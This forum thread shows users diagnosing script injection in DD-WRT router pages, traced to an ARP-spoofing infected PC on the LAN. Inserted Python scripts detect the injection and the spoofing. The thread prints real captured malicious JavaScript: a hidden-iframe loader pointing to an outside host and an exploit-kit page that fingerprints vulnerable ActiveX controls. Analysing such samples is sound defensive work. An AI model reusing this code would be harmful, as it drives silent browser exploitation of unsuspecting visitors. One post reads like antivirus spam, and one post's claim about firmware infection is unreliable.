Trojan/virus PC is infecting DD-WRT. Help

DD-WRT Forum Index -> Broadcom SoC based Hardware
Jabroni
DD-WRT User


Joined: 17 Jun 2006
Posts: 88

Posted: Fri Oct 17, 2008 17:58    Post subject: Trojan/virus PC is infecting DD-WRT. Help
This has happened to me before, and I'm not sure how they are doing it. I have a WRT600N router flashed with DD-WRT SVN build 10431. When I try to get onto a restricted page on the router (i.e. Administration) I rapidly get the pink screen that says:

Code:

Authorization required. please note that the default username is "root" in all newer releases


Analyzing its HTML, it references another page to try to load a JavaScript file:


Code:

<script language="javascript" SRC="http://sun.ads2008.info/vip.js"></script>                                     <HTML><HEAD><TITLE>401 Unauthorized</TITLE></HEAD>
<BODY BGCOLOR="#cc9999"><H4>401 Unauthorized</H4>
Authorization required. please note that the default username is "root" in all newer releases
</BODY></HTML>


The URL it tries to load is Status_Router.asp.

I can, however, still access the router via telnet and execute commands via the shell, but web access is unusable, and the page it redirects to tries to install malware if used with IE. Any idea how these trojans/viruses are infecting the DD-WRT? At first I thought it would be DNS poisoning, but this version already has the patched dnsmasq...

UPDATES:

* note: the admin password wasn't the default one.
** after analyzing the pages it takes you to, it takes you to a Japanese/Chinese server
soulstace
DD-WRT Guru


Joined: 04 Aug 2007
Posts: 6427

Posted: Fri Oct 17, 2008 18:06    Post subject:
Scan your PC for malware?

Does it happen with other web browsers such as Firefox, Opera, Safari, Chrome, etc?
Jabroni
DD-WRT User


Joined: 17 Jun 2006
Posts: 88

Posted: Fri Oct 17, 2008 18:10    Post subject:
soulstace wrote:
Scan your PC for malware?

Does it happen with other web browsers such as Firefox, Opera, Safari, Chrome, etc?


Yup... Firefox, IE and Chrome... and on all machines that are connected to the router...


OK, I rebooted and it seems that it started working again... as if the DD-WRT had the 'infection' in memory only.
soulstace
DD-WRT Guru


Joined: 04 Aug 2007
Posts: 6427

Posted: Fri Oct 17, 2008 18:31    Post subject:
Sorry, I don't know what to tell you. No problems here.

Make sure SPI firewall is enabled. If it already is, then you likely have some problem on the LAN.
Jabroni
DD-WRT User


Joined: 17 Jun 2006
Posts: 88

Posted: Mon Jan 05, 2009 20:28    Post subject:
This has happened to me several times now...

Here's the HTML it outputs now (it points to a different URL for the JavaScript):

Code:

<script language="javascript" type="text/javascript" src="http://vc.zaqaab.cn/vc.js"></script>                                                                                                                                   <HTML><HEAD><TITLE>401 Unauthorized</TITLE></HEAD>
<BODY BGCOLOR="#cc9999"><H4>401 Unauthorized</H4>
Authorization required. please note that the default username is "root" in all newer releases
</BODY></HTML>


The JavaScript content is:

Code:

// Runs once per victim per day: if the marker cookie is already set, do nothing
var cookieString=document.cookie;
var start=cookieString.indexOf("cookiesleepv");
if(start!=-1){}else{
  // otherwise set a 24-hour marker cookie...
  var expires=new Date();
  expires.setTime(expires.getTime()+24*60*60*1000);
  document.cookie="cookiesleepv=test;expires="+expires.toGMTString();
  // ...and pull the exploit landing page in a zero-height iframe
  document.write("<iframe src=http://vc.zaqaab.cn/vc.htm width=50 height=0 border=0></iframe>");}


And if I check the vc.htm it injects via the JS:
Code:

<script language="javascript" type="text/javascript" src="http://vc.zaqaab.cn/vc.js"></script>                                                                                         <html>
<script>
// Unconditional exploit iframes, plus one more for IE7 only
document.write("<iframe width=100 height=0 src=flash.htm></iframe>");
document.write("<iframe width=100 height=0 src=xx.htm></iframe>");
document.write("<iframe width=100 height=0 src=14.htm></iframe>");
if(navigator.userAgent.toLowerCase().indexOf("msie 7")>0)
document.write("<iframe src=tt.htm width=100 height=0></iframe>");
// Probe for the Xunlei (Thunder) download-manager ActiveX control; the ProgID is
// split across string literals, presumably to evade signature scanners
try{var d;
var lz=new ActiveXObject("GLI"+"EDown.I"+"EDown.1");}
catch(d){};
finally{if(d!="[object Error]"){document.write("<iframe width=100 height=0 src=lz.htm></iframe>");}}
// Probe for the Microsoft Access Snapshot Viewer control
try{var b;
var of=new ActiveXObject("snpvw.Snap"+"shot Viewer Control.1");}
catch(b){};
finally{if(b!="[object Error]"){document.write("<iframe width=100 height=0 src=office.htm></iframe>");}}
// The same Xunlei probe again (duplicated in the original)
try{var d;
var lz=new ActiveXObject("GLI"+"EDown.I"+"EDown.1");}
catch(d){};
finally{if(d!="[object Error]"){document.write("<iframe width=100 height=0 src=lz.htm></iframe>");}}
// RealPlayer ActiveX control: choose the exploit page by the installed version
function Game()
{
Sameee = "IERPCtl.IERPCtl.1";
try
{
Gime = new ActiveXObject(Sameee);
}catch(error){return;}
Tellm = Gime.PlayerProperty("PRODUCTVERSION");
if(Tellm<="6.0.14.552")
document.write("<iframe width=100 height=0 src=real.htm></iframe>");
else
document.write("<iframe width=100 height=0 src=real.html></iframe>");
}
Game();
</script><script type="text/javascript" src="http://js.tongji.cn.yahoo.com/869209/ystat.js"></script><noscript><a href="http://tongji.cn.yahoo.com"><img src="http://img.tongji.cn.yahoo.com/869209/ystat.gif"/></a></noscript>
</html>



I have changed the default internal HTTP port to 8080, changed the default username (root) and password, and disabled UPnP, SNMP, and all unnecessary services.

I'm running
Firmware: DD-WRT v24-sp2 (11/25/08) mega
on a Linksys WRT600N (since it was the last stable build for this unit).

I've tried different browsers and machines, and the same happens. Is there any other way to debug why it won't even let me log in to the router? (When I click on a tab, instead of asking me for the username/password it takes me directly to the pink 401 page with the infected JavaScript.)

Anyone else experienced something similar?
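The page dumps above share one signature: an absolute, off-router script tag prepended ahead of the <HTML> root, followed by whitespace padding and then the router's genuine 401 page. The check below is an added example, not code from this thread or from DD-WRT: it takes a captured response body plus the router's host and reports every external script URL, and whether it sits before the root element. The sample bodies are constructed here from the two dumps in the thread; nothing is fetched from the network.

```python
import re
from urllib.parse import urlparse

# Constructed sample bodies (not fetched): the DD-WRT 401 page as it looks
# without the injection, and the two injected versions quoted in the thread.
CLEAN_401 = (
    '<HTML><HEAD><TITLE>401 Unauthorized</TITLE></HEAD>\n'
    '<BODY BGCOLOR="#cc9999"><H4>401 Unauthorized</H4>\n'
    'Authorization required. please note that the default username is "root" '
    'in all newer releases\n</BODY></HTML>'
)
INJECTED_OCT = (
    '<script language="javascript" SRC="http://sun.ads2008.info/vip.js"></script>'
    + ' ' * 37 + CLEAN_401
)
INJECTED_JAN = (
    '<script language="javascript" type="text/javascript" '
    'src="http://vc.zaqaab.cn/vc.js"></script>' + ' ' * 179 + CLEAN_401
)

SCRIPT_TAG = re.compile(r'<script\b[^>]*>', re.I)
SRC_ATTR = re.compile(r'\bsrc\s*=\s*["\']?([^"\'\s>]+)', re.I)
ROOT_TAG = re.compile(r'<html\b', re.I)


def find_injected_scripts(body, router_host):
    """Return [(url, before_root), ...] for each <script src=...> whose host is
    not the router. DD-WRT's UI uses only inline or relative scripts, so any
    absolute off-router script URL is suspect. before_root is True when the tag
    sits ahead of the <html> root element, which is where the injecting proxy
    in the thread put it."""
    # Accept "192.168.1.1" or "192.168.1.1:8080"; the port is deliberately ignored
    router_host = (urlparse('//' + router_host).hostname or router_host).lower()
    root = ROOT_TAG.search(body)
    root_at = root.start() if root else len(body)
    hits = []
    for tag in SCRIPT_TAG.finditer(body):
        src = SRC_ATTR.search(tag.group(0))
        if not src:
            continue                      # inline script, no src attribute
        url = src.group(1)
        host = (urlparse(url).hostname or '').lower()
        if not host:
            continue                      # relative URL, served by the router itself
        if host != router_host:
            hits.append((url, tag.start() < root_at))
    return hits


def looks_tampered(body, router_host):
    """True when at least one off-router script was found in the body."""
    return bool(find_injected_scripts(body, router_host))


if __name__ == '__main__':
    for name, body in (('Oct 2008', INJECTED_OCT), ('Jan 2009', INJECTED_JAN), ('clean', CLEAN_401)):
        print(name, find_injected_scripts(body, '192.168.1.1'))
```

To use it on a live router, save a body with `curl -s http://192.168.1.1/Status_Router.asp -o body.html` and pass the file contents in. Relative script URLs are trusted because the router serves them itself; a proxy that rewrote the router's own scripts in place would not be caught by this check, only by diffing the page against a copy retrieved on the router itself over telnet, a path the LAN attacker cannot touch.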
LOM
DD-WRT Guru


Joined: 28 Dec 2008
Posts: 7647

Posted: Mon Jan 05, 2009 21:33    Post subject:
Jabroni wrote:

Yup... Firefox, IE and Chrome... and on all machines that are connected to the router...


On all computers connected to that LAN!

They are infected with the trojan JS.Agent.xx, where xx is a combination of two letters.
Jabroni
DD-WRT User


Joined: 17 Jun 2006
Posts: 88

Posted: Tue Jan 06, 2009 1:13    Post subject:
LOM wrote:
Jabroni wrote:

Yup... Firefox, IE and Chrome... and on all machines that are connected to the router...


On all computers connected to that LAN!

They are infected with the trojan JS.Agent.xx, where xx is a combination of two letters.


OK, I just found out how they do it... I found this page:
http://topfueber.de/2008/07/mxcontent-typecn443-nice-trojan-how-to-get-rid-of-it/#english

Quote:

The cause is a trojan horse (virus) on another computer in your network!

This other computer is telling your PC that it is the gateway to the internet by modifying its hardware address (MAC). Your computer consequently sends all traffic to the infected PC, which forwards it to the internet and filters it in order to insert its malicious code.

You can find out which computer is the evil one by typing the following into your command line:
arp -a
In the table that appears, search for a doubly assigned physical address, one that is assigned both to the gateway IP address and to another IP.
Find out which computer is the other IP and you will have the virus host.
Scan that one for viruses and malware (we are just about to conduct that scan).


And I guess that the JS it injects makes something break on the DD-WRT, and that's why it responds with an invalid username/password.
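The quoted procedure boils down to one lookup: find every IP in the local ARP cache that shares the gateway's MAC. The script below is an added example, not from this thread or the linked page: it parses either Windows or Linux `arp -a` output, applies that lookup, and adds a second check the quote does not mention, comparing the cached gateway MAC with the real one, which you can read on the router itself over telnet (`ifconfig br0`, br0 being DD-WRT's LAN bridge). The ARP tables and MAC addresses are constructed for the example.

```python
import re
import sys

# Constructed ARP tables in the two formats a user in this thread would meet:
# Windows "arp -a" and Linux/BusyBox "arp -a". All MAC addresses are made up.
# 192.168.1.105 answering with the gateway's MAC is the spoofing host.
WINDOWS_ARP = """\
Interface: 192.168.1.100 --- 0x4
  Internet Address      Physical Address      Type
  192.168.1.1           00-1d-7e-12-34-56     dynamic
  192.168.1.105         00-1d-7e-12-34-56     dynamic
  192.168.1.110         00-0c-29-ab-cd-ef     dynamic
  192.168.1.255         ff-ff-ff-ff-ff-ff     static
  224.0.0.22            01-00-5e-00-00-16     static
"""

LINUX_ARP = """\
? (192.168.1.1) at 00:1d:7e:12:34:56 [ether] on eth0
? (192.168.1.110) at 00:0c:29:ab:cd:ef [ether] on eth0
"""

IP_RE = re.compile(r'\b(\d{1,3}(?:\.\d{1,3}){3})\b')
MAC_RE = re.compile(r'\b([0-9a-f]{2}(?:[:-][0-9a-f]{2}){5})\b', re.I)


def normalize_mac(mac):
    """Lowercase, colon-separated form so Windows and Linux entries compare equal."""
    return mac.lower().replace('-', ':')


def parse_arp_table(text):
    """Return [(ip, mac), ...]. Lines without both an IP and a MAC (column
    headers, the Windows 'Interface:' line) are skipped."""
    entries = []
    for line in text.splitlines():
        ip, mac = IP_RE.search(line), MAC_RE.search(line)
        if ip and mac:
            entries.append((ip.group(1), normalize_mac(mac.group(1))))
    return entries


def check_gateway(entries, gateway_ip, expected_mac=None):
    """Apply the quoted check (which other IPs share the gateway's MAC?) and,
    when the real gateway MAC is known, flag a cached MAC that differs from it."""
    by_ip = {}
    for ip, mac in entries:
        by_ip.setdefault(ip, mac)
    gw_mac = by_ip.get(gateway_ip)
    result = {'gateway_mac': gw_mac, 'impostors': [], 'mac_mismatch': False}
    if gw_mac is None:
        return result                    # gateway not cached; nothing to compare
    result['impostors'] = sorted(ip for ip, mac in entries
                                 if mac == gw_mac and ip != gateway_ip)
    if expected_mac is not None:
        result['mac_mismatch'] = gw_mac != normalize_mac(expected_mac)
    return result


if __name__ == '__main__':
    gateway = sys.argv[1] if len(sys.argv) > 1 else '192.168.1.1'
    expected = sys.argv[2] if len(sys.argv) > 2 else None
    text = sys.stdin.read() if not sys.stdin.isatty() else WINDOWS_ARP
    print(check_gateway(parse_arp_table(text), gateway, expected))
```

Pipe the real table in with `arp -a | python arp_check.py 192.168.1.1 00:1d:7e:12:34:56`. The "impostor" IP is the spoofer's own address only when it answers with its real hardware address; a spoofer that forges the source MAC as well shows up only through the mismatch check. A host that legitimately owns several IPs on one NIC also produces a duplicate, so confirm before reimaging anything, and remember that the cache reflects only recent traffic.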
yeti
DD-WRT Novice


Joined: 19 May 2008
Posts: 13

Posted: Wed Jan 07, 2009 1:45    Post subject:
A Trojan Horse?!?

Sounds like an entire Trojan Stable to me!
tonny57
DD-WRT Novice


Joined: 01 Jun 2010
Posts: 1

Posted: Tue Jun 01, 2010 10:49    Post subject:
Hi! Maybe you should change your antivirus. I use a version that gives me no problems and I really have no viruses. So I recommend you use it. You can download it from here: kaspersky security 7
Masterman
DD-WRT Guru


Joined: 24 Aug 2009
Posts: 2070
Location: South Florida

Posted: Tue Jun 01, 2010 12:07    Post subject:
The best A/V I have ever used is Avast. Not only is it free, but it will do a boot-time scan as well as screen-saver scans... Great piece of software. Been using it for 3 years.

http://www.avast.com/index#tab2

_________________
Optware, the Right Way
Asus RT-AC68U
Asus RT-N66U
Asus RT-N10
Asus RT-N12
Asus RT-N16 x5
Asus WL520gU
Engenious ECB350
Linksys WRT600Nv1.1
Linksys WRT610Nv1
Linksys E2000
Netgear WNDR3300
SonicWall NSA220W
SonicWall TZ215W
SonicWall TZ205W
SonicWall TZ105W
redhawk0
DD-WRT Guru


Joined: 04 Jan 2007
Posts: 11563
Location: Wherever the wind blows- North America

Posted: Tue Jun 01, 2010 12:29    Post subject:
AVG is also very good... and free.

www.avg.com/free

I've been using it on my home PC for years... never a problem with viruses.

redhawk

_________________
The only stupid question....is the unasked one.
dave-levy
DD-WRT Novice


Joined: 12 Apr 2010
Posts: 16

Posted: Tue Jun 01, 2010 12:35    Post subject:
Just to be clear here, does this occurrence mean the software is actually loaded into router memory, or is this purely a PC problem?
redhawk0
DD-WRT Guru


Joined: 04 Jan 2007
Posts: 11563
Location: Wherever the wind blows- North America

Posted: Tue Jun 01, 2010 12:43    Post subject:
dave-levy wrote:
Just to be clear here, does this occurrence mean the software is actually loaded into router memory, or is this purely a PC problem?


This is really an archaic post (2008)... but the way I understand it was that if the PC is infected, then when you flashed the router, it injected the FW code with a virus... someone correct me if I am wrong.

So... by protecting your PC, you can also protect your router... there are other malware problems with router FWs... but BS had patched the FW to remedy this. Read the announcements about the Milworm exploit (it's in my recommended FW post).

redhawk

_________________
The only stupid question....is the unasked one.
oxygenx
DD-WRT Guru


Joined: 11 Nov 2007
Posts: 566

Posted: Tue Jun 01, 2010 13:39    Post subject:
redhawk0 wrote:

This is really an archaic post (2008)... but the way I understand it was that if the PC is infected, then when you flashed the router, it injected the FW code with a virus... someone correct me if I am wrong.

No, it has nothing to do with DD-WRT. Another computer on the LAN spoofed the ARP entries of the gateway (in this case a DD-WRT router) and then proxied and modified all loaded HTML pages to infect more computers.
frater
DD-WRT Guru


Joined: 07 Jun 2006
Posts: 2777

Posted: Tue Jun 01, 2010 14:42    Post subject:
I'm not saying it's impossible, but it's very unlikely that the DD-WRT itself is infected. Reading the way the OP is analyzing and drawing conclusions, it becomes less and less likely that it has anything to do with DD-WRT.
_________________
Asus RT16N + OTRW
Kingston 4GB USB-disk 128 MB swap + 1.4GB ext3 on /opt + 2 GB ext3 on /mnt
Copperjet 1616 modem in ZipB-config
Asterisk, pixelserv & Pound running on router
Another Asus RT16N as WDS-bridge

DD-WRT v24-sp2 vpn (c) 2010 NewMedia-NET GmbH
Release: 12/16/10 (SVN revision: 15758M)